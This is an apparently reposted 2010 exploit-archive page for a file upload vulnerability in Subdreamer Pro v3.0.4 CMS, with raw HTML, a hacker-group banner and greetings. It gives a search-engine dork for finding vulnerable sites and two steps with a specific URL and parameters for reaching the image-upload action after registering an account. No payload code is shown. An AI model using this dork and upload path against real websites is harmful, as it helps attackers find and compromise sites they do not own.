Home / os / win7

Subdreamer Pro v3.0.4 CMS upload Vulnerability

Posted on 28 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Subdreamer Pro v3.0.4 CMS upload Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==============================================
Subdreamer Pro v3.0.4 CMS upload Vulnerability
==============================================


__________         __    __                              .__
\\______   \\_____ _/  |__/  |_  ____  __ __  ___________  |__|
 |    |  _/\\__  \\\\   __\\   __\\/  _ \\|  |  \\/  ___/\\__  \\ |  |
 |    |   \\ / __ \\|  |  |  | (  &lt;_&gt; )  |  /\\___ \\  / __ \\|  |
 |______  /(____  /__|  |__|  \\____/|____//____  &gt;(____  /__|
        \\/      \\/                             \\/      \\/  
 
######################################################
# Exploit Title: Subdreamer Pro v3.0.4 CMS upload Vulnerability
# Author: Battousai
# Home: http://hack.pro.mk &amp; https://ssteam.ws
# Software Link:N/A
# Version: v3.0.4
# Tested on: Windows XP SP3, Linux Ubuntu 10.04
# CVE : N/A
#Dork: \&quot;Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media\&quot;
######################################################
 
 
Exploit:
 
1. Register your account at: http://127.0.0.1/index.php?categoryid=4
 
2. After registring point your browser at: http://127.0.0.1/index.php?categoryid=2&amp;p17_sectionid=2&amp;p17_action=submitimage (and upload is complete)
 
 
 
######################################################
# Greetz to: SilenceD, Zer0Flag, Evilb4st4rd, internet
# KingPin, s3th, packetdeath, Horadrim, AnnexxEmpire
# sM10, 599eme Man, Xylitol, __KiNG, 777, sp1r1t
# d3v1l, AlphaDog, n3d
# and every living person at:
# http://hack.pro.mk &amp; https://ssteam.ws
######################################################


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :